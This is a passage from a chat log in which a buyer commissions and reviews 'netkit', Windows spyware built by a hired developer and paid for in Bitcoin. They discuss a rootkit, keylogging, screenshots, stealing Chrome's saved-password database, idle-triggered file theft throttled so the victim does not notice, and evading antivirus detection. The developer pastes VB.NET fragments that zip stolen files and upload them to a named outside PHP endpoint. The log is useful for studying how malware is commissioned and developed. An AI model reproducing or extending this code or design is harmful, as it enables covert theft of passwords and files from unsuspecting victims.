  2144. [12/19/2012 8:56:26 PM] ' Tweety HF;: since it's on ring3
  2145. [12/19/2012 8:56:32 PM] ' Tweety HF;: it bypasses admin rights
  2146. [12/19/2012 8:56:43 PM] Shelly Bongo: ok
  2147. [12/19/2012 8:57:00 PM] Shelly Bongo: show me sqlite working
  2148. [12/19/2012 9:00:29 PM] Shelly Bongo: ...
  2149. [12/19/2012 9:00:59 PM] ' Tweety HF;: it downloads it..
  2150. [12/19/2012 9:01:06 PM] Shelly Bongo: it's corrupted.
  2151. [12/19/2012 9:01:08 PM] Shelly Bongo: it doesn't work
  2152. [12/19/2012 9:01:15 PM] ' Tweety HF;: yeah i know
  2153. [12/19/2012 9:01:31 PM] Shelly Bongo: ok, lets continue in the meanwhile
  2154. [12/19/2012 9:01:35 PM] Shelly Bongo: mark sqlite as a bug to fix
  2155. [12/19/2012 9:01:40 PM] ' Tweety HF;: alright
  2156. [12/19/2012 9:01:54 PM] Shelly Bongo: where are the passwords?
  2157. [12/19/2012 9:01:58 PM] Shelly Bongo: in the log file?
  2158. [12/19/2012 9:01:58 PM] ' Tweety HF;: sys info
  2159. [12/19/2012 9:02:01 PM] ' Tweety HF;: yeah
  2160. [12/19/2012 9:02:37 PM] ' Tweety HF;: oh
  2161. [12/19/2012 9:02:45 PM] ' Tweety HF;: and if you do somehow magically find netkit's process
  2162. [12/19/2012 9:02:45 PM] ' Tweety HF;: and try to end it
  2163. [12/19/2012 9:02:51 PM] ' Tweety HF;: you get blue screen of death
  2164. [12/19/2012 9:03:23 PM] Shelly Bongo: which are the files that are dropped by netkit?
  2165. [12/19/2012 9:03:26 PM] Shelly Bongo: updates.dll
  2166. [12/19/2012 9:03:29 PM] Shelly Bongo: and what else?
  2167. [12/19/2012 9:03:29 PM] ' Tweety HF;: yeah
  2168. [12/19/2012 9:03:43 PM] ' Tweety HF;: it drops everything, zips it up, and after delivery deletes them from the system
  2169. [12/19/2012 9:03:47 PM] ' Tweety HF;: it uses an API to do it
  2170. [12/19/2012 9:03:52 PM] Shelly Bongo: what if the user is offline
  2171. [12/19/2012 9:03:54 PM] Shelly Bongo: or the delivery fails
  2172. [12/19/2012 9:04:16 PM] ' Tweety HF;: it waits till the internet connection is back online
  2173. [12/19/2012 9:04:19 PM] Shelly Bongo: will it retry delivering all the files in that directory?
  2174. [12/19/2012 9:04:22 PM] ' Tweety HF;: yeah
  2175. [12/19/2012 9:04:29 PM] Shelly Bongo: e.g. if 20 files piled up
  2176. [12/19/2012 9:04:34 PM] Shelly Bongo: when it can - it'll deliver them all?
  2177. [12/19/2012 9:04:39 PM] ' Tweety HF;: yes
  2178. [12/19/2012 9:04:54 PM] Shelly Bongo: show me the retry code
  2179. [12/19/2012 9:05:33 PM] ' Tweety HF;: End If
  2180.         If FileWriter("SELECT * load", Nothing) = "SELECT * complete" Then
  2181.             For Each File As [String] In Temp
  2182.                 Hash.Add(File)
  2183.             Next
  2184.             For Each Location As [String] In Locations
  2185. [12/19/2012 9:05:40 PM] ' Tweety HF;: it loads all the files it has in the hashes
  2186. [12/19/2012 9:05:49 PM] ' Tweety HF;: if it's not loaded in, in the next one it will add it to the queue
  2187. [12/19/2012 9:06:00 PM] ' Tweety HF;: If Not Send.Count = 0 Then
  2188. [12/19/2012 9:06:03 PM] ' Tweety HF;: it will check the count
  2189. [12/19/2012 9:06:12 PM] ' Tweety HF;: if the file has been sent 0 times, it will redo it
  2190. [12/19/2012 9:06:19 PM] ' Tweety HF;:  If Not Send.Count = 0 Then
  2191.                 ZipFiles(Send.ToArray(), Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\system\" + ZipName(Item.Files) + ".Zip")
  2192.                 Upload(Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\system\" + ZipName(Item.Files) + ".Zip")
  2193.                 Hash.Clear()
  2194.                 Send.Clear()
  2195.             End If
  2196. [12/19/2012 9:06:44 PM] Shelly Bongo: okay
  2197. [12/19/2012 9:06:47 PM] Shelly Bongo: looks good so far
  2198. [12/19/2012 9:06:49 PM] ' Tweety HF;: mhm
  2199. [12/19/2012 9:06:54 PM] Shelly Bongo: though i'm not happy with the fact it drops files
  2200. [12/19/2012 9:07:07 PM] Shelly Bongo: it explains the 9/35 detection
  2201. [12/19/2012 9:07:23 PM] ' Tweety HF;: the detections are generic
  2202. [12/19/2012 9:07:33 PM] ' Tweety HF;: its nothing to do with the dropped files
  2203. [12/19/2012 9:07:48 PM] Shelly Bongo: how complex is it to FUD it?
  2204. [12/19/2012 9:08:04 PM] ' Tweety HF;: not complex, just takes maybe 20-30 mins
  2205. [12/19/2012 9:08:06 PM] ' Tweety HF;: but
  2206. [12/19/2012 9:08:12 PM] ' Tweety HF;: the source won't be readable if i do that
  2207. [12/19/2012 9:08:39 PM] Shelly Bongo: oh... so it has to be done in source, because it gets compiled to MSIL - and AVs decompile .Net exe files back to MSIL and use patterns to find malware..
  2208. [12/19/2012 9:08:55 PM] ' Tweety HF;: they don't decompile
  2209. [12/19/2012 9:09:00 PM] ' Tweety HF;: they look for string hashes
  2210. [12/19/2012 9:09:03 PM] ' Tweety HF;: like this
  2211. [12/19/2012 9:09:43 PM] Shelly Bongo: encrypted transfer - show me
  2212. [12/19/2012 9:10:01 PM] ' Tweety HF;: i can't exactly show that lol
  2213. [12/19/2012 9:10:06 PM] Shelly Bongo: yes you can
  2214. [12/19/2012 9:10:08 PM] Shelly Bongo: run wireshark
  2215. [12/19/2012 9:10:23 PM] ' Tweety HF;: i wrote an encryption class
  2216. [12/19/2012 9:10:26 PM] ' Tweety HF;: aes 256 bits
  2217. [12/19/2012 9:10:51 PM] ' Tweety HF;: oh yeah
  2218. [12/19/2012 9:10:53 PM] ' Tweety HF;: sec
  2219. [12/19/2012 9:11:48 PM] Shelly Bongo: is it really aes?
  2220. [12/19/2012 9:11:50 PM] Shelly Bongo: doesn't look like it
  2221. [12/19/2012 9:11:54 PM] Shelly Bongo: where's the encryption password
  2222. [12/19/2012 9:12:08 PM] ' Tweety HF;: sec
  2223. [12/19/2012 9:12:50 PM] ' Tweety HF;: phone
  2224. [12/19/2012 9:14:01 PM] Shelly Bongo: show me update.php
  2225. [12/19/2012 9:14:25 PM] ' Tweety HF;: simple
  2226. [12/19/2012 9:14:44 PM] Shelly Bongo: where's the aes key?
  2227. [12/19/2012 9:15:05 PM] ' Tweety HF;: at the moment it's keyless, it just uses aes 256 encryption
  2228. [12/19/2012 9:15:08 PM] ' Tweety HF;: i set the key to blank
  2229. [12/19/2012 9:15:17 PM] Shelly Bongo: so it's not aes
  2230. [12/19/2012 9:15:23 PM] Shelly Bongo: if you knew anything about crypto, you'd know that
  2231. [12/19/2012 9:15:28 PM] ' Tweety HF;: it is aes..
  2232. [12/19/2012 9:15:30 PM] Shelly Bongo: it's probably some crap keyless crypto
  2233. [12/19/2012 9:15:35 PM] ' Tweety HF;: no.
  2234. [12/19/2012 9:15:37 PM] ' Tweety HF;: it's aes
  2235. [12/19/2012 9:15:39 PM] ' Tweety HF;: 256
  2236. [12/19/2012 9:15:43 PM] ' Tweety HF;: but i did not put a key on it
  2237. [12/19/2012 9:17:45 PM] Shelly Bongo: where's sqlite stored? as part of sysinfo zip?
  2238. [12/19/2012 9:17:49 PM] Shelly Bongo: (when it works)
  2239. [12/19/2012 9:19:12 PM] ' Tweety HF;: it's stored in file transfer
  2240. [12/19/2012 9:19:17 PM] ' Tweety HF;: so files
  2241. [12/19/2012 9:19:22 PM] Shelly Bongo: move it to sysinfo zip
  2242. [12/19/2012 9:19:29 PM] Shelly Bongo: it's a part of the password stealing
  2243. [12/19/2012 9:19:41 PM] ' Tweety HF;: but it's a whole file
  2244. [12/19/2012 9:19:47 PM] ' Tweety HF;: or you want me to move it to that zip
  2245. [12/19/2012 9:19:48 PM] Shelly Bongo: yes, you can stick it into the zip
  2246. [12/19/2012 9:19:50 PM] Shelly Bongo: yep
  2247. [12/19/2012 9:21:09 PM] Shelly Bongo: please do it later
  2248. [12/19/2012 9:21:12 PM] Shelly Bongo: we're almost done
  2249. [12/19/2012 9:21:19 PM] Shelly Bongo: i want to talk about file stealer now
  2250. [12/19/2012 9:21:31 PM] ' Tweety HF;: done
  2251. [12/19/2012 9:22:03 PM] Shelly Bongo: but before that - show me the *different* variables for intervals for files/logs/screenshots/sysinfo
  2252. [12/19/2012 9:22:22 PM] ' Tweety HF;: keylogger interval
  2253. [12/19/2012 9:22:39 PM] ' Tweety HF;: Public WithEvents Screenshot_Timer As Windows.Forms.Timer = New Windows.Forms.Timer With {.Interval = 60000, .Enabled = True}
  2254. [12/19/2012 9:22:42 PM] ' Tweety HF;: for screenshots
  2255. [12/19/2012 9:22:49 PM] ' Tweety HF;:     Public WithEvents Cycle_Timer As Windows.Forms.Timer = New Windows.Forms.Timer With {.Interval = 60000, .Enabled = True}
  2256. [12/19/2012 9:22:51 PM] ' Tweety HF;: file cycle timer
  2257. [12/19/2012 9:23:10 PM] Shelly Bongo: and sysinfo?
  2258. [12/19/2012 9:23:32 PM] ' Tweety HF;: sys info runs every time the comp is rebooted
  2259. [12/19/2012 9:23:35 PM] Shelly Bongo: okay
  2260. [12/19/2012 9:23:39 PM] Shelly Bongo: so on startup of netkit?
  2261. [12/19/2012 9:23:56 PM] ' Tweety HF;: yes
  2262. [12/19/2012 9:24:09 PM] Shelly Bongo: i want to add a timer to it - to re-run after it has been started too
  2263. [12/19/2012 9:24:14 PM] Shelly Bongo: e.g. once every 12 hours (default timer)
  2264. [12/19/2012 9:24:20 PM] Shelly Bongo: ok?
  2265. [12/19/2012 9:25:50 PM] ' Tweety HF;: Done
  2266. [12/19/2012 9:25:59 PM] Shelly Bongo: okay
  2267. [12/19/2012 9:26:02 PM] Shelly Bongo: now the file stealer
  2268. [12/19/2012 9:26:27 PM] Shelly Bongo: if i start netkit
  2269. [12/19/2012 9:26:55 PM] Shelly Bongo: and after 1min the computer becomes idle (e.g. screen saver kicks in, or user locks the comp)
  2270. [12/19/2012 9:27:02 PM] Shelly Bongo: i want file stealer to start stealing
  2271. [12/19/2012 9:27:08 PM] Shelly Bongo: is it in the code? if so show me
  2272. [12/19/2012 9:27:29 PM] ' Tweety HF;: yes
  2273. [12/19/2012 9:28:02 PM] ' Tweety HF;: it checks every 5min
  2274. [12/19/2012 9:28:11 PM] ' Tweety HF;:  If IdleTicks <= 300000 Then
  2275.                     Cycle(Location)
  2276.                 End If
  2277. [12/19/2012 9:28:32 PM] Shelly Bongo: no - this checks that if comp was idle for LESS than 5 mins, then it steals files
  2278. [12/19/2012 9:28:39 PM] Shelly Bongo: why for LESS?
  2279. [12/19/2012 9:28:44 PM] Shelly Bongo: should be for more
  2280. [12/19/2012 9:28:52 PM] ' Tweety HF;: oh whoops lol
  2281. [12/19/2012 9:28:59 PM] Shelly Bongo: also
  2282. [12/19/2012 9:29:05 PM] Shelly Bongo: this runs every CycleTimer
  2283. [12/19/2012 9:29:12 PM] Shelly Bongo: CycleTimer is the timer for file stealing
  2284. [12/19/2012 9:29:13 PM] Shelly Bongo: right?
  2285. [12/19/2012 9:29:20 PM] ' Tweety HF;: this is within cycle timer
  2286. [12/19/2012 9:29:26 PM] ' Tweety HF;: cycle timer checks for all the conditions
  2287. [12/19/2012 9:30:05 PM] Shelly Bongo: okay - i want a separate timer for the idle check - check idle every 5 min and send stuff if idle
  2288. [12/19/2012 9:30:19 PM] Shelly Bongo: stealertime should run every hour - and send files even if not idle
  2289. [12/19/2012 9:30:36 PM] ' Tweety HF;: thats the same as idle?
  2290. [12/19/2012 9:31:09 PM] Shelly Bongo: what do you mean
  2291. [12/19/2012 9:31:13 PM] ' Tweety HF;: think i'm getting confuzzled
  2292. [12/19/2012 9:31:17 PM] ' Tweety HF;: can you explain the 2 conditions
  2293. [12/19/2012 9:31:21 PM] Shelly Bongo: yes
  2294. [12/19/2012 9:31:26 PM] Shelly Bongo: but sorry i have to leave for another 3 hours
  2295. [12/19/2012 9:31:33 PM] ' Tweety HF;: oh my
  2296. [12/19/2012 9:31:34 PM] Shelly Bongo: we have little left to go over
  2297. [12/19/2012 9:31:34 PM] ' Tweety HF;: >.>
  2298. [12/19/2012 9:31:36 PM] ' Tweety HF;: alright
  2299. [12/19/2012 11:31:52 PM] Shelly Bongo: hi
  2300. [12/19/2012 11:33:40 PM] Shelly Bongo: i'll explain the 2 different triggers for file-stealer to send out files:
  2301. 1) if FILECYCLE_TIMER reached (default: 1 hour) - meaning that every 1 hour, it should send out files
  2302. 2) if the computer has been idle for more than 5 minutes
  2303. [12/19/2012 11:34:30 PM] Shelly Bongo: the two triggers are independent of one another - meaning it could be that FILECYCLE_TIMER just finished running, and after 1 min the second trigger kicks in because the computer has been idle for more than 5min - so it'll send files again
  2304. [12/19/2012 11:34:32 PM] Shelly Bongo: got it?
  2305. [12/19/2012 11:40:05 PM] ' Tweety HF;: 1 sec
  2306. [12/19/2012 11:40:08 PM] ' Tweety HF;: just making some coffee
  2307. [12/19/2012 11:43:15 PM] Shelly Bongo: okay
  2308. [12/19/2012 11:43:40 PM] Shelly Bongo: i'm hoping we can finish tonight
  2309. [12/19/2012 11:43:54 PM] Shelly Bongo: my BTC has been ready and waiting since last week.
  2310. [12/19/2012 11:44:31 PM] Shelly Bongo: let me know if the above behavior for file stealer is understood and you're going to implement it, as it seems like it was misunderstood previously.
  2311. [12/19/2012 11:47:06 PM] ' Tweety HF;: ohh ok
  2312. [12/19/2012 11:47:10 PM] ' Tweety HF;: i get it
  2313. [12/19/2012 11:50:13 PM] Shelly Bongo: okay great
  2314. [12/19/2012 11:53:12 PM] ' Tweety HF;: Done
  2315. [12/19/2012 11:53:21 PM] Shelly Bongo: another thing (i'm going over the filestealer.txt description)
  2316. [12/19/2012 11:53:26 PM] Shelly Bongo: FILER_MAX_FILESIZE - implemented?
  2317. [12/19/2012 11:53:30 PM] Shelly Bongo: my concern is this
  2318. [12/19/2012 11:53:37 PM] Shelly Bongo: imagine target has 200mb of files that match...
  2319. [12/19/2012 11:53:45 PM] ' Tweety HF;: a 200mb word file..?
  2320. [12/19/2012 11:53:46 PM] Shelly Bongo: he will notice his internet connection being slow..
  2321. [12/19/2012 11:53:52 PM] Shelly Bongo: imagine he has 20000 word files.
  2322. [12/19/2012 11:54:03 PM] Shelly Bongo: i want to limit each "cycle" to something
  2323. [12/19/2012 11:54:20 PM] Shelly Bongo: there are 2 limitations i want
  2324. [12/19/2012 11:54:23 PM] Shelly Bongo: 1) maximum filesize
  2325. [12/19/2012 11:54:27 PM] Shelly Bongo: (e.g. 10MB)
  2326. [12/19/2012 11:54:40 PM] Shelly Bongo: so if a file that matches the pattern is larger than this - it doesn't get sent
  2327. [12/19/2012 11:55:10 PM] Shelly Bongo: and 2) maximum number of files per cycle (default: 10) - so each file stealing cycle, no more than 10 files will leak out
  2328. [12/19/2012 11:55:26 PM] ' Tweety HF;: lol
  2329. [12/19/2012 11:55:30 PM] ' Tweety HF;: it uses multi byte packets
  2330. [12/19/2012 11:55:36 PM] ' Tweety HF;: it's seriously not an issue
  2331. [12/19/2012 11:55:39 PM] Shelly Bongo: what?
  2332. [12/19/2012 11:55:46 PM] ' Tweety HF;: multi byte packets
  2333. [12/19/2012 11:55:51 PM] ' Tweety HF;: each packet is multi threaded
  2334. [12/19/2012 11:55:54 PM] ' Tweety HF;: it's not:
  2335. [12/19/2012 11:56:04 PM] ' Tweety HF;: [packet1] then [packet2] basis
  2336. [12/19/2012 11:56:13 PM] ' Tweety HF;: it's [packet1] + [packet2] at the same time
  2337. [12/19/2012 11:56:29 PM] Shelly Bongo: i think you're not getting the concern
  2338. [12/19/2012 11:56:34 PM] Shelly Bongo: regardless, i want these 2 limitations
  2339. [12/19/2012 11:56:38 PM] ' Tweety HF;: alright
  2340. [12/19/2012 11:56:42 PM] Shelly Bongo: they've been in the spec from day 1
  2341. [12/19/2012 11:57:02 PM] Shelly Bongo: did you fix sqlite btw?
  2342. [12/19/2012 11:57:06 PM] Shelly Bongo: the sqlite stealing
  2343. [12/19/2012 11:57:08 PM] Shelly Bongo: for chrome
  2344. [12/19/2012 11:57:41 PM] ' Tweety HF;: checking it now
  2345. [12/19/2012 11:57:44 PM] Shelly Bongo: ok
  2346. [12/19/2012 11:59:29 PM] Shelly Bongo: so
  2347. [12/19/2012 11:59:38 PM] Shelly Bongo: to be orderly
  2348. [12/19/2012 11:59:40 PM] Shelly Bongo: + sysinfo password recovery (chrome sqlite file stealer) - fix it to make it work
  2349. + file stealer: add FILER_MAX_FILESIZE (files above this size don't get sent) & FILER_MAX_FILES (max amount of files to send in each cycle/zip) limitations
  2350. + aes with password - encrypt in netkit and decrypt in php before storing the file
  2351. + put all config vars into a single file
  2352. [12/19/2012 11:59:57 PM] Shelly Bongo: this is what you have left to do - once it's done we have another TV session
  2353. [12/20/2012 12:00:09 AM] Shelly Bongo: and complete the purchase
  2354. [12/20/2012 12:00:39 AM] Shelly Bongo: ok?
  2355. [12/20/2012 12:07:38 AM] ' Tweety HF;: ok
  2356. [12/20/2012 12:39:05 AM] ' Tweety HF;: done
  2357. [12/20/2012 12:45:56 AM] ' Tweety HF;: What now?
  2358. [12/20/2012 12:46:13 AM] Shelly Bongo: done with all of the above?
  2359. [12/20/2012 12:46:16 AM] Shelly Bongo: are you sure?
  2360. [12/20/2012 12:46:30 AM] ' Tweety HF;: Sec
  2361. [12/20/2012 12:54:17 AM] ' Tweety HF;: all done now
  2362. [12/20/2012 12:56:37 AM] ' Tweety HF;: the reason that the sqlite got corrupt
  2363. [12/20/2012 12:57:02 AM] ' Tweety HF;: was because of how the debugger paused netkit to show the break
  2364. [12/20/2012 1:00:04 AM] Shelly Bongo: ok
  2365. [12/20/2012 1:00:38 AM] Shelly Bongo: so you implemented both  FILER_MAX_FILESIZE and FILER_MAX_FILES ?
  2366. [12/20/2012 1:01:18 AM] ' Tweety HF;: yes
  2367. [12/20/2012 1:02:20 AM] Shelly Bongo: did you put all the configurable variables into a single file (so that i don't have to jump through various .vb files)?
  2368. [12/20/2012 1:02:49 AM] ' Tweety HF;: its not in a single file
  2369. [12/20/2012 1:02:55 AM] ' Tweety HF;: but its very easy to change
  2370. [12/20/2012 1:02:58 AM] ' Tweety HF;: or do you want 1 file
  2371. [12/20/2012 1:03:27 AM] Shelly Bongo: i want 1 file
  2372. [12/20/2012 1:03:34 AM] ' Tweety HF;: ill add a structure
  2373. [12/20/2012 1:03:34 AM] ' Tweety HF;: hold on
  2374. [12/20/2012 1:03:37 AM] Shelly Bongo: ok
  2375. [12/20/2012 1:09:59 AM] ' Tweety HF;:  Public Structure Settings
  2376.         Public Shared Host$ = "http://www.hftweety.site88.net/data/Update.php"
  2377.         Public Shared Key$ = "key"
  2378.         Public Shared Screenshot_Timer_Interval% = 60000
  2379.         Public Shared Cycle_Timer_Interval% = 60000
  2380.         Public Shared Idle_Timer_Interval% = 60000
  2381.         Public Shared KeyStroke_Interval% = 60000
  2382.     End Structure
  2383. [12/20/2012 1:10:02 AM] ' Tweety HF;: Am i missing anything?
  2384. [12/20/2012 1:10:06 AM] ' Tweety HF;: oh files timer
  2385. [12/20/2012 1:10:10 AM] ' Tweety HF;: oh nvm, thats cycle
  2386. [12/20/2012 1:10:46 AM] ' Tweety HF;: anything else?
  2387. [12/20/2012 1:13:40 AM] Shelly Bongo: hmm
  2388. [12/20/2012 1:13:57 AM] Shelly Bongo: the extensions of files for the file stealer
  2389. [12/20/2012 1:14:29 AM] Shelly Bongo: also,  FILER_MAX_FILESIZE &  FILER_MAX_FILES
  2390. [12/20/2012 1:14:34 AM] ' Tweety HF;: alright
  2391. [12/20/2012 1:15:34 AM] Shelly Bongo: after you're done with this, there's one last thing - the encryption
  2392. [12/20/2012 1:16:00 AM] ' Tweety HF;: what about it
  2393. [12/20/2012 1:16:34 AM] Shelly Bongo: you send out encrypted files (with what you claim is a password-less AES 256), and the PHP just saves those files
  2394. [12/20/2012 1:16:41 AM] Shelly Bongo: I want the PHP to *decrypt* them before saving
  2395. [12/20/2012 1:18:03 AM] ' Tweety HF;: i know
  2396. [12/20/2012 1:18:05 AM] ' Tweety HF;: i did that
  2397. [12/20/2012 1:18:19 AM] Shelly Bongo: the PHP file you showed me had no decryption routines
  2398. [12/20/2012 1:18:37 AM] ' Tweety HF;: i didnt put them in since i was testing
  2399. [12/20/2012 1:18:40 AM] ' Tweety HF;: but i fixed it up
  2400. [12/20/2012 1:18:44 AM] Shelly Bongo: okay
  2401. [12/20/2012 1:18:53 AM | Removed 1:19:29 AM] ' Tweety HF;: This message has been removed.
  2402. [12/20/2012 1:19:41 AM] Shelly Bongo: so after you're done with making those global settings, lets have another session
  2403. [12/20/2012 1:19:55 AM] Shelly Bongo: show me that the last changes we made work
  2404. [12/20/2012 1:20:01 AM] Shelly Bongo: and i'll transfer the BTC
  2405. [12/20/2012 1:20:06 AM] Shelly Bongo: and you provide the source
  2406. [12/20/2012 1:20:10 AM] Shelly Bongo: and delete from your computer
  2407. [12/20/2012 1:20:17 AM] ' Tweety HF;: sure
  2408. [12/20/2012 1:30:24 AM] ' Tweety HF;: done
  2409. [12/20/2012 1:31:54 AM] Shelly Bongo: great!
  2410. [12/20/2012 1:31:59 AM] Shelly Bongo: let me connect to you now
  2411. [12/20/2012 1:32:06 AM] Shelly Bongo: and show me
  2412. [12/20/2012 1:32:17 AM] Shelly Bongo: [Wednesday, December 19, 2012 11:59 PM] Shelly Bongo:
  2413.  
  2414. <<< + sysinfo password recovery (chrome sqlite file stealer) - fix it to make it work
  2415. + file stealer: add FILER_MAX_FILESIZE (files above this size don't get sent) & FILER_MAX_FILES (max amount of files to send in each cycle/zip) limitations
  2416. + aes with password - encrypt in netkit and decrypt in php before storing the file
  2417. + put all config vars into a single file
  2418. [12/20/2012 1:33:04 AM] ' Tweety HF;: https://secure.join.me/110-420-021
  2419. [12/20/2012 1:33:16 AM] Shelly Bongo: lets start with sysinfo
  2420. [12/20/2012 1:33:23 AM] ' Tweety HF;: 1 sec
  2421. [12/20/2012 1:33:44 AM] ' Tweety HF;: what about it
  2422. [12/20/2012 1:34:01 AM] ' Tweety HF;: i already tested everything
  2423. [12/20/2012 1:34:17 AM] Shelly Bongo: you didn't show me how sqlite file gets sent along with sysinfo, show me
  2424. [12/20/2012 1:35:37 AM] ' Tweety HF;: ok look
  2425. [12/20/2012 1:35:41 AM] ' Tweety HF;: this is 35mb word file
  2426. [12/20/2012 1:36:08 AM] ' Tweety HF;: and other one is like 10 kb
  2427. [12/20/2012 1:36:23 AM] ' Tweety HF;: Public Shared Function IsEligible(ByVal File As [String]) As Boolean
  2428.         Dim FileInfo As New IO.FileInfo(File)
  2429.         If FileInfo.Length <= NetKit.Settings.MAX_FILE_SIZE Then Return True
  2430.         If Not FileInfo.Length <= NetKit.Settings.MAX_FILE_SIZE Then Return False
  2431.         Return Nothing
  2432.     End Function
  2433. [12/20/2012 1:36:31 AM] ' Tweety HF;: this checks if a file is eligible to be sent
  2434. [12/20/2012 1:41:39 AM] Shelly Bongo: what's going on
  2435. [12/20/2012 1:41:57 AM] ' Tweety HF;: there's an error throwing
  2436. [12/20/2012 1:42:01 AM] ' Tweety HF;: and its because my browser is open
  2437. [12/20/2012 1:42:05 AM] ' Tweety HF;: i just realized it
  2438. [12/20/2012 1:42:26 AM] Shelly Bongo: so if chrome is open, it wont be able to take the sqlite file?
  2439. [12/20/2012 1:42:32 AM] ' Tweety HF;: apparently not
  2440. [12/20/2012 1:42:35 AM] ' Tweety HF;: which is a bit retarded
  2441. [12/20/2012 1:42:45 AM] ' Tweety HF;: chrome doesn't need to access it unless it actually uses it
  2442. [12/20/2012 1:42:59 AM] Shelly Bongo: when you open it, are you opening in read only mode?
  2443. [12/20/2012 1:43:11 AM] ' Tweety HF;: it doesn't open anything
  2444. [12/20/2012 1:43:16 AM] ' Tweety HF;: it just copies it and adds it to a zip
  2445. [12/20/2012 1:43:57 AM] ' Tweety HF;: what i can do is
  2446. [12/20/2012 1:44:15 AM] ' Tweety HF;: if the user is idled, then close the browser, send the sqlite, and reopen the browser
  2447. [12/20/2012 1:45:06 AM] Shelly Bongo: i prefer to keep as is
  2448. [12/20/2012 1:45:22 AM] Shelly Bongo: just make it not throw exceptions - ignore exceptions - if there's a problem, continue
  2449. [12/20/2012 1:45:29 AM] Shelly Bongo: (send the zip, just without the sqlite)
  2450. [12/20/2012 1:45:52 AM] ' Tweety HF;: yeah sure
  2451. [12/20/2012 1:45:55 AM] ' Tweety HF;: its done already
  2452. [12/20/2012 1:46:24 AM] ' Tweety HF;: whats next on the list
  2453. [12/20/2012 1:46:26 AM] ' Tweety HF;: and btw
  2454. [12/20/2012 1:46:38 AM] ' Tweety HF;: SQLite Database Browser 2.0 b1.exe
  2455. [12/20/2012 1:46:42 AM] ' Tweety HF;: you need that to view the sqlite data
  2456. [12/20/2012 1:46:52 AM] Shelly Bongo: close chrome, and show me that it works with chrome closed
  2457. [12/20/2012 1:52:13 AM] Shelly Bongo: lol...
  2458. [12/20/2012 1:52:28 AM] ' Tweety HF;: i think
  2459. [12/20/2012 1:52:29 AM] ' Tweety HF;: im being trolled
  2460. [12/20/2012 1:52:32 AM] ' Tweety HF;: by vs
  2461. [12/20/2012 1:52:34 AM] Shelly Bongo: every time we do a session you have features not working, why don't you check before it??
  2462. [12/20/2012 1:52:40 AM] ' Tweety HF;: i did
  2463. [12/20/2012 1:52:47 AM] ' Tweety HF;: its driving me mad
  2464. [12/20/2012 1:52:50 AM] ' Tweety HF;: i put the path in
  2465. [12/20/2012 1:52:53 AM] ' Tweety HF;: and it says it dont exist?
  2466. [12/20/2012 1:53:40 AM] ' Tweety HF;: LOL
  2467. [12/20/2012 1:53:43 AM] ' Tweety HF;: it dont exist apparently
  2468. [12/20/2012 1:54:36 AM] ' Tweety HF;: can you give me the location
  2469. [12/20/2012 1:54:38 AM] ' Tweety HF;: of your sqlite3
  2470. [12/20/2012 1:55:00 AM] Shelly Bongo: how do i check
  2471. [12/20/2012 1:55:06 AM] ' Tweety HF;: C:\Users\Momz\AppData\Local\Google\Chrome\User Data\Default
  2472. [12/20/2012 1:55:09 AM] ' Tweety HF;: then look for it
  2473. [12/20/2012 1:55:10 AM] ' Tweety HF;: in sync
  2474. [12/20/2012 1:56:39 AM] ' Tweety HF;: working now.
  2475. [12/20/2012 1:56:57 AM] Shelly Bongo: ok show me
  2476. [12/20/2012 1:57:07 AM] Shelly Bongo: the whole sysinfo zip
  2477. [12/20/2012 1:57:14 AM] Shelly Bongo: info passwords sqlite
  2478. [12/20/2012 1:57:47 AM] ' Tweety HF;: sec
  2479. [12/20/2012 2:00:27 AM] ' Tweety HF;: done
  2480. [12/20/2012 2:00:27 AM] ' Tweety HF;: look
  2481. [12/20/2012 2:01:04 AM] ' Tweety HF;: it corrupts..
  2482. [12/20/2012 2:01:05 AM] ' Tweety HF;: wow..
  2483. [12/20/2012 2:01:06 AM] ' Tweety HF;: wtf
  2484. [12/20/2012 2:03:06 AM] ' Tweety HF;: 1 more try
  2485. [12/20/2012 2:03:46 AM] ' Tweety HF;: haha got it
  2486. [12/20/2012 2:04:24 AM] ' Tweety HF;: zipping it corrupts it for some reason
  2487. [12/20/2012 2:04:28 AM] ' Tweety HF;: no worries, i fixed it
  2488. [12/20/2012 2:04:37 AM] Shelly Bongo: this code looks VERY buggy.
  2489. [12/20/2012 2:04:47 AM] Shelly Bongo: lots of exceptions and errors all around
  2490. [12/20/2012 2:05:13 AM] Shelly Bongo: the AES PHP you pasted is bullshit
  2491. [12/20/2012 2:05:32 AM] ' Tweety HF;: there's no exceptions that need to be caught and disposed of
  2492. [12/20/2012 2:05:37 AM] ' Tweety HF;: the aes in php is a class file
  2493. [12/20/2012 2:05:38 AM] Shelly Bongo: this netkit began well but is ending very badly
  2494. [12/20/2012 2:06:10 AM] Shelly Bongo: does file-max-size and file-max-num work at least?
  2495. [12/20/2012 2:07:00 AM] Shelly Bongo: ?
  2496. [12/20/2012 2:07:13 AM] ' Tweety HF;: yes..
  2497. [12/20/2012 2:07:18 AM] ' Tweety HF;: i already showed you how it works
  2498. [12/20/2012 2:07:25 AM] Shelly Bongo: ok
  2499. [12/20/2012 2:07:27 AM] Shelly Bongo: listen
  2500. [12/20/2012 2:07:31 AM] Shelly Bongo: honestly, this is shit code.
  2501. [12/20/2012 2:07:38 AM] ' Tweety HF;: lol no.
  2502. [12/20/2012 2:07:50 AM] Shelly Bongo: i have indian who write better and charge less
  2503. [12/20/2012 2:08:00 AM] Shelly Bongo: more orderly, less bugs
  2504. [12/20/2012 2:08:17 AM] Shelly Bongo: and i dont need to tell them benign things like "put all the variables in a single place"
  2505. [12/20/2012 2:08:36 AM] Shelly Bongo: it's obvious you're new to coding hacking programs
  2506. [12/20/2012 2:08:43 AM] ' Tweety HF;: oh thats a new one
  2507. [12/20/2012 2:08:53 AM | Edited 2:10:09 AM] Shelly Bongo: you're young and eager which is nice, but this is anything but professional
  2508. [12/20/2012 2:08:58 AM] Shelly Bongo: i'm sure you'll get there in time
  2509. [12/20/2012 2:09:09 AM] Shelly Bongo: in short - i'm willing to pay $100 for the source, no more
  2510. [12/20/2012 2:09:32 AM] Shelly Bongo: if you don't want it, i walk away, my remaining budget allows me to get the same program from another supplier who will do simply a better job.
  2511. [12/20/2012 2:09:48 AM] ' Tweety HF;: Sure. But im removing the rootkit in that case.
  2512. [12/20/2012 2:10:22 AM] Shelly Bongo: no, this is absurd
  2513. [12/20/2012 2:10:50 AM] Shelly Bongo: you have delayed me, half of the features have been removed - i had to explain to you (worse than to an indian) like 20 times how features should work until you understood it and rectified it
  2514. [12/20/2012 2:11:00 AM] Shelly Bongo: and the features that ARE in - have bugs all the time
